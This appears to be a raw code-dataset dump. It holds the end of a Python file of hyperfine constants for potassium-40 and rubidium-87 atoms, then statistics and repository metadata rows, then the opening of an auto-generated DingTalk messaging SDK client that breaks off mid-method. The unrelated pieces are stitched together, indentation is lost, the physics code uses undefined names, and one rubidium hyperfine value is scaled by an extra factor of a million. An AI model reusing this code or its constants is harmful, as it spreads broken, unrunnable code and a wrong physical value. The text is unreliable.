h = 6.62607015e-34 # m^2 kg / s
hbar = 1.0545718e-34 # m^2 kg / s
mu_bohr = e*hbar/(2*m_e)
mu_nuclear = e*hbar/(2*m_p)
g_L = 0.99998627
g_e = 2.0023193043737
def get_g_J(atom):
return g_L * (atom.J*(atom.J+1) - atom.S*(atom.S+1) + \
atom.L*(atom.L+1))/(2*atom.J*(atom.J+1)) + \
g_e * (atom.J*(atom.J+1) + atom.S*(atom.S+1) - \
atom.L*(atom.L+1))/(2*atom.J*(atom.J+1))
class K40:
def __init__(self):
self.S = 1/2
self.I = 4
self.g_I = 0.000176490
class K40_4S_J12(K40):
def __init__(self):
super().__init__()
self.L = 0
self.J = 1/2
self.g_J = get_g_J(self)
self.a_hf = -285.7308*1e6 # h * Hz
self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
self.b_hf = 0
# class K40_4S_J12_F92(K40):
# def __init__(self):
# super().__init__()
# self.L = 0
# # self.S = 1/2
# self.J = 1/2
# # self.I = 4
# self.F = 9/2
# # self.g_I = 0.000176490
# self.g_J = get_g_J(self)
# self.a_hf = -285.7308*1e6 # h * Hz
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
# class K40_4S_J12_F72(K40):
# def __init__(self):
# super().__init__()
# self.L = 0
# # self.S = 1/2
# self.J = 1/2
# # self.I = 4
# self.F = 7/2
# # self.g_I = 0.000176490
# self.g_J = get_g_J(self)
# self.a_hf = -285.7308*1e6 # h * Hz
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
class K40_4P_J32(K40):
def __init__(self):
super().__init__()
self.L = 1
self.J = 3/2
self.g_J = get_g_J(self)
self.a_hf = -7.585*1e6
self.b_hf = -3.445*1e6
########################################################################################
class Rb87:
def __init__(self):
self.S = 1/2
self.I = 3/2
self.g_I = -0.0009951414
class Rb87_5S_J12(Rb87):
def __init__(self):
super().__init__()
self.L = 0
self.J = 1/2
self.g_J = get_g_J(self)
self.a_hf = 3417.34130545215*1e6 # h * Hz
self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
self.b_hf = 0
# class Rb87_5S_J12_F1(Rb87):
# def __init__(self):
# super().__init__()
# self.L = 0
# self.J = 1/2
# self.F = 1
# # self.g_I = 0.000176490
# self.g_J = g_L * (self.J*(self.J+1) - self.S*(self.S+1) + \
# self.L*(self.L+1))/(2*self.J*(self.J+1)) + \
# g_e * (self.J*(self.J+1) + self.S*(self.S+1) - \
# self.L*(self.L+1))/(2*self.J*(self.J+1))
# self.g_F = -1/2
# self.a_hf = 3417.34130545215*1e6 # h * Hz
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
# class Rb87_5S_J12_F2(Rb87):
# def __init__(self):
# super().__init__()
# self.L = 0
# self.J = 1/2
# self.F = 2
# # self.g_I = 0.000176490
# self.g_J = g_L * (self.J*(self.J+1) - self.S*(self.S+1) + \
# self.L*(self.L+1))/(2*self.J*(self.J+1)) + \
# g_e * (self.J*(self.J+1) + self.S*(self.S+1) - \
# self.L*(self.L+1))/(2*self.J*(self.J+1))
# self.g_F = 1/2
# self.a_hf = 3417.34130545215*1e6 # h
# self.delta_E_hf = self.a_hf * (self.I+0.5) # Hz
# self.b_hf = 0
class Rb87_5P_J32(Rb87):
def __init__(self):
super().__init__()
self.L = 1
self.J = 3/2
self.g_J = get_g_J(self)
self.a_hf = 84.7185*1e6 # h * Hz
self.delta_E_hf = self.a_hf * (self.I+0.5) * 1e6 # Hz
self.b_hf = 12.4965*1e6 # h * Hz
| 27.398601
| 88
| 0.464523
| 664
| 3,918
| 2.480422
| 0.112952
| 0.07286
| 0.058288
| 0.077717
| 0.826351
| 0.805707
| 0.802672
| 0.802672
| 0.798421
| 0.769885
| 0
| 0.161839
| 0.339204
| 3,918
| 143
| 89
| 27.398601
| 0.474314
| 0.499234
| 0
| 0.474576
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118644
| false
| 0
| 0
| 0.016949
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b3da9c815a4868ca0e4606c1fd6c87c6103397db
| 83,154
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/im_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/im_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/im_1_0/client.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.im_1_0 import models as dingtalkim__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = ''
if UtilClient.empty(self._endpoint):
self._endpoint = 'api.dingtalk.com'
def topbox_close(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxCloseHeaders()
return self.topbox_close_with_options(request, headers, runtime)
async def topbox_close_async(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.TopboxCloseHeaders()
return await self.topbox_close_with_options_async(request, headers, runtime)
def topbox_close_with_options(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
headers: dingtalkim__1__0_models.TopboxCloseHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxCloseResponse(),
self.do_roarequest('TopboxClose', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/close', 'none', req, runtime)
)
async def topbox_close_with_options_async(
self,
request: dingtalkim__1__0_models.TopboxCloseRequest,
headers: dingtalkim__1__0_models.TopboxCloseHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.TopboxCloseResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.TopboxCloseResponse(),
await self.do_roarequest_async('TopboxClose', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/topBoxes/close', 'none', req, runtime)
)
def update_interactive_card(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateInteractiveCardHeaders()
return self.update_interactive_card_with_options(request, headers, runtime)
async def update_interactive_card_async(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateInteractiveCardHeaders()
return await self.update_interactive_card_with_options_async(request, headers, runtime)
def update_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
headers: dingtalkim__1__0_models.UpdateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.card_options):
body['cardOptions'] = request.card_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateInteractiveCardResponse(),
self.do_roarequest('UpdateInteractiveCard', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/interactiveCards', 'json', req, runtime)
)
async def update_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateInteractiveCardRequest,
headers: dingtalkim__1__0_models.UpdateInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.out_track_id):
body['outTrackId'] = request.out_track_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.private_data):
body['privateData'] = request.private_data
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.user_id_type):
body['userIdType'] = request.user_id_type
if not UtilClient.is_unset(request.card_options):
body['cardOptions'] = request.card_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateInteractiveCardResponse(),
await self.do_roarequest_async('UpdateInteractiveCard', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/interactiveCards', 'json', req, runtime)
)
def update_group_sub_admin(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupSubAdminHeaders()
return self.update_group_sub_admin_with_options(request, headers, runtime)
async def update_group_sub_admin_async(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateGroupSubAdminHeaders()
return await self.update_group_sub_admin_with_options_async(request, headers, runtime)
def update_group_sub_admin_with_options(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
headers: dingtalkim__1__0_models.UpdateGroupSubAdminHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_ids):
body['userIds'] = request.user_ids
if not UtilClient.is_unset(request.role):
body['role'] = request.role
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupSubAdminResponse(),
self.do_roarequest('UpdateGroupSubAdmin', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/subAdmins', 'json', req, runtime)
)
async def update_group_sub_admin_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateGroupSubAdminRequest,
headers: dingtalkim__1__0_models.UpdateGroupSubAdminHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateGroupSubAdminResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_ids):
body['userIds'] = request.user_ids
if not UtilClient.is_unset(request.role):
body['role'] = request.role
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateGroupSubAdminResponse(),
await self.do_roarequest_async('UpdateGroupSubAdmin', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/subAdmins', 'json', req, runtime)
)
def query_members_of_group_role(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders()
return self.query_members_of_group_role_with_options(request, headers, runtime)
async def query_members_of_group_role_async(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders()
return await self.query_members_of_group_role_with_options_async(request, headers, runtime)
def query_members_of_group_role_with_options(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
headers: dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.open_role_id):
body['openRoleId'] = request.open_role_id
if not UtilClient.is_unset(request.timestamp):
body['timestamp'] = request.timestamp
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse(),
self.do_roarequest('QueryMembersOfGroupRole', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/roles/members/query', 'json', req, runtime)
)
async def query_members_of_group_role_with_options_async(
self,
request: dingtalkim__1__0_models.QueryMembersOfGroupRoleRequest,
headers: dingtalkim__1__0_models.QueryMembersOfGroupRoleHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.open_role_id):
body['openRoleId'] = request.open_role_id
if not UtilClient.is_unset(request.timestamp):
body['timestamp'] = request.timestamp
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.QueryMembersOfGroupRoleResponse(),
await self.do_roarequest_async('QueryMembersOfGroupRole', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/roles/members/query', 'json', req, runtime)
)
def update_member_group_nick(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateMemberGroupNickHeaders()
return self.update_member_group_nick_with_options(request, headers, runtime)
async def update_member_group_nick_async(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateMemberGroupNickHeaders()
return await self.update_member_group_nick_with_options_async(request, headers, runtime)
def update_member_group_nick_with_options(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
headers: dingtalkim__1__0_models.UpdateMemberGroupNickHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.group_nick):
body['groupNick'] = request.group_nick
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateMemberGroupNickResponse(),
self.do_roarequest('UpdateMemberGroupNick', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupNicks', 'json', req, runtime)
)
async def update_member_group_nick_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateMemberGroupNickRequest,
headers: dingtalkim__1__0_models.UpdateMemberGroupNickHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateMemberGroupNickResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.group_nick):
body['groupNick'] = request.group_nick
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateMemberGroupNickResponse(),
await self.do_roarequest_async('UpdateMemberGroupNick', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupNicks', 'json', req, runtime)
)
def get_interconnection_url(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetInterconnectionUrlHeaders()
return self.get_interconnection_url_with_options(request, headers, runtime)
async def get_interconnection_url_async(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.GetInterconnectionUrlHeaders()
return await self.get_interconnection_url_with_options_async(request, headers, runtime)
def get_interconnection_url_with_options(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
headers: dingtalkim__1__0_models.GetInterconnectionUrlHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.app_user_id):
body['appUserId'] = request.app_user_id
if not UtilClient.is_unset(request.app_user_name):
body['appUserName'] = request.app_user_name
if not UtilClient.is_unset(request.app_user_avatar):
body['appUserAvatar'] = request.app_user_avatar
if not UtilClient.is_unset(request.app_user_avatar_type):
body['appUserAvatarType'] = request.app_user_avatar_type
if not UtilClient.is_unset(request.app_user_mobile_number):
body['appUserMobileNumber'] = request.app_user_mobile_number
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_user_id):
body['dingUserId'] = request.ding_user_id
if not UtilClient.is_unset(request.msg_page_setting_id):
body['msgPageSettingId'] = request.msg_page_setting_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetInterconnectionUrlResponse(),
self.do_roarequest('GetInterconnectionUrl', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interconnections/sessions/urls', 'json', req, runtime)
)
async def get_interconnection_url_with_options_async(
self,
request: dingtalkim__1__0_models.GetInterconnectionUrlRequest,
headers: dingtalkim__1__0_models.GetInterconnectionUrlHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.GetInterconnectionUrlResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.app_user_id):
body['appUserId'] = request.app_user_id
if not UtilClient.is_unset(request.app_user_name):
body['appUserName'] = request.app_user_name
if not UtilClient.is_unset(request.app_user_avatar):
body['appUserAvatar'] = request.app_user_avatar
if not UtilClient.is_unset(request.app_user_avatar_type):
body['appUserAvatarType'] = request.app_user_avatar_type
if not UtilClient.is_unset(request.app_user_mobile_number):
body['appUserMobileNumber'] = request.app_user_mobile_number
if not UtilClient.is_unset(request.ding_corp_id):
body['dingCorpId'] = request.ding_corp_id
if not UtilClient.is_unset(request.ding_user_id):
body['dingUserId'] = request.ding_user_id
if not UtilClient.is_unset(request.msg_page_setting_id):
body['msgPageSettingId'] = request.msg_page_setting_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetInterconnectionUrlResponse(),
await self.do_roarequest_async('GetInterconnectionUrl', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/interconnections/sessions/urls', 'json', req, runtime)
)
def send_template_interactive_card(
self,
request: dingtalkim__1__0_models.SendTemplateInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendTemplateInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendTemplateInteractiveCardHeaders()
return self.send_template_interactive_card_with_options(request, headers, runtime)
async def send_template_interactive_card_async(
self,
